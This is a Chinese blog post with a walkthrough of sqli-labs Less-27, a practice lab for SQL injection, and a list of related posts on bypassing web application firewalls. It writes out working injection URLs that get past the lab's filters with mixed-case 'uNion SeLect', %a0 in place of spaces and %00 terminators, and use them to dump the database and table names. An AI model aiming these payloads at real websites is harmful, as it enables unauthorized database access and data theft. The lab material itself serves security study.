sqli-labs-less-27 大小写绕过waf

最新推荐文章于 2024-07-30 17:17:52 发布
最新推荐文章于 2024-07-30 17:17:52 发布
阅读量515 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/111179399
版权

Less-27

sql注入 WAF绕过相关笔记:点击此处less-25

首先按照提示使用id
http://192.168.99.100/Less-27/?id=1 返回正常,有回显
http://192.168.99.100/Less-27/?id=1’ 出现报错
http://192.168.99.100/Less-27/?id=1’ ;%00 返回正常,绕过注释
在这里插入图片描述
在这里插入图片描述

判断字段数:
http://192.168.99.100/Less-27/?id=1’ %a0 order %a0 by %a0 3;%00

获取回显位:
http://192.168.99.100/Less-27/?id=1’ %a0 union %a0 select %a0 1,%a0 2,%a0 3;%00 返回错误,查看一下提示,union、select消失,说明对这两个词进行了转义,我们使用大小写混合
在这里插入图片描述

http://192.168.99.100/Less-27/?id=11111’ %a0 uNion %a0 SeLect %a0 1,%a0 2,%a0 3;%00 成功使用大小写混合绕过
在这里插入图片描述
在这里插入图片描述

获取数据库:
http://192.168.99.100/Less-27/?id=11111’ %a0 uNion %a0 SeLect %a0 1,%a0 2,%a0 database();%00
在这里插入图片描述

获取security中的表:
http://192.168.99.100/Less-27/?id=11111’ %a0 uNion %a0 SeLect %a0 1,%a0 2,%a0 (sEleCt %a0 group_concat(table_name) %a0 from %a0 inForMaTiOn_schema.tables %a0 where %a0 table_schema=0x7365637572697479) ;%00
在这里插入图片描述
在这里插入图片描述

此关卡使用大小写即可绕过waf防护,其他查询不再重复

yzcn
关注
专栏目录
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 740
继续学习sqli-labs,本篇是less17
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1690
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQL注入---大小写绕过
qq_41179687的博客
03-26 769
WEB安全篇 SQL注入绕过技术 02 大小写转换 NULL值 N值 双引号 十六进制绕过注入 1、大小写转换 select * from users where id=1 Union sEleCT 1,2,3,4; 在less中测试 内容被过滤 空格被过滤掉 用%0a替换空格,空格未被过滤 爆出账号密码 http://192.168.50.185:7766/Less-27/?id=9999%27%0AUniOn%0ASelecT%0A1,(SelecT%0Agroup_
sqli-labs第2727a
最新发布
weixin_46023655的博客
07-30 530
sqli-labs第2727a
SQL注入_WAF绕过(一)环境准备、更改提交方式、大小写、加密解密、编码解码、双写绕过、换行、注释符内联注释符绕过、同义词绕过、HTTP参数污染
qq_51550750的博客
03-30 2027
一、WAF拦截原理 WAF从规则库中匹配敏感字符进行拦截 简单理解就是:WAF会对数据包的内容进行过滤或者正则表达式的匹配,对非法的字符等进行处理。 二、WAF绕过方式简单概览 三、练习WAF绕过_环境准备 在虚拟机中布置好sqli-labs(搭建在phpstudy中),下载并且安装好下面的安装狗: 建议不要在真机中安装安全狗,毕竟安全狗相比于其他的安全产品已经出现很久了,体验感还是很不好的。 打开sqli-labs靶场,以less2这一为例: 按照没有WAF的情况下注入: (1)正常输入下: ht
SQL注入实战:绕过操作
ting_liang的博客
01-27 2663
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入绕过技术
一米八多的瑞兹的博客
03-07 156
SQL注入绕过技术 1. 大小写绕过 如果程序中设置了过滤键字,但是过滤过程中并没有对键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤。当然这种过滤只是发现键字出现,并不会对键字处理。 通过修改键字内字母大小写绕过过滤措施。例如:AnD 1=1 例如:在进行探测当前表的字段数时,使用order by 数字进行探测。如果过滤了order ,可以使用OrdER来进行绕过。 2. 双写绕过 如果在程序中设置出现键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以
sqli-labs-php7环境搭建及通记录
weixin_44644249的博客
10-28 1719
sqli-labs-php7环境搭建及通记录 sqli-labs-php7环境搭建及通记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs靶场实战25-30题
qq_42261604的博客
02-28 3981
Less-25 过滤or和and,过滤方式是将其替换为空,使用双重字符可绕过,如oorr,anandd。 单引号注入判断 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=2 -- - 异常 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=1 -- - 登录成功 报错注入 http://127.0.0.1/sql/Less-25/?id=1' anandd update...
sqlmap使用教程(sqli-labs1-10详解)
小同的博客
05-22 4642
-u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请
Sqli - labs实战笔记
浪子燕青的博客
02-25 504
Sqli - labs 安装与lesson1-4实战 所需环境: 1. PHP 2. MYSQL 3. Apache/Nginx 以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意: 1. Debian下的MySql每次登录的时候默认需要授权,即必须使用sudo,可以修改配置文件忽略默认授权,修改方法在之前的文件有提起过. 2. Apache存放文件放在/var/www/html/目录下 3. sqli-labs 使用的PHP5编写的,但是Debian默认安装PHP7,兼..
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli-labs第27a
2401_84254343的博客
06-21 681
需要注意的是,键字只过滤了union、UNION、Union,这三种形式,可以使用其他的大小写组合绕过。这一是查询功能,地址栏输入id作为参数,后台根据id查询用户数据,并在前端页面显示出来。确定第一个字符的内容后,再按照此方法判断其余字符,为了提高效率,稍后使用脚本去枚举。参数中添加双引号,页面异常(空)显示,说明后台隐藏了报错信息,不适合报错注入。字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;输入不同的参数,页面会动态显示对应的用户数据,可以考虑联合注入。
sqli-less27过滤注入
青空桑
05-22 278
sqli-less27过滤注入 一、检查网站 127.0.0.1/sqli/less-27/?id=1' 1、可以发现空格被过滤了 空格的部分替换方法:/%0a/、%0a、%09 2、–+也被过滤了 可以选择封装代码:简单来说就是代码结尾加上 ,’ 二、爆数据库名 编写思路:1、过滤部分(空格,–+,大小写)2、查询思路 ?id=0%27%0aUNIon%0aSElect%0a1,database(),%27 三、爆表名 id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0a
sqli-labs/Less-27
m0_71299382的博客
11-20 394
sqli-labs第二十七
sqli-labs通攻略教程六(less26~less28a)
m0_55854679的博客
07-21 844
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sql绕过技巧
weixin_55821558的博客
05-05 1827
sql绕过的方式一般有如下几种: 1.大小写绕过 2.堆叠绕过 3.编码绕过 4.内联注释 常见绕过 绕空格: 1.用注释替换空格 select/**/user,password/**/from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(user())from dual where(1=1)and(2=2) 7.回车 绕引号 使用十六进制如下图: sele
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
sqli-labs(27)
weixin_30901729的博客
05-28 441
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
sqllab第二十七笔记
I_WORM的博客
03-17 434
构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1。构造payload:id=1'%09and%09exp(710)='1。经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测。构造payload:id=1'%09and%091='1。页面给出了提示,联合查询键字被过滤了,直接使用错误注入。页面成功回显出了相信息,说明绕过成功。构造payload:id=1''成功获取到了数据库名;
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值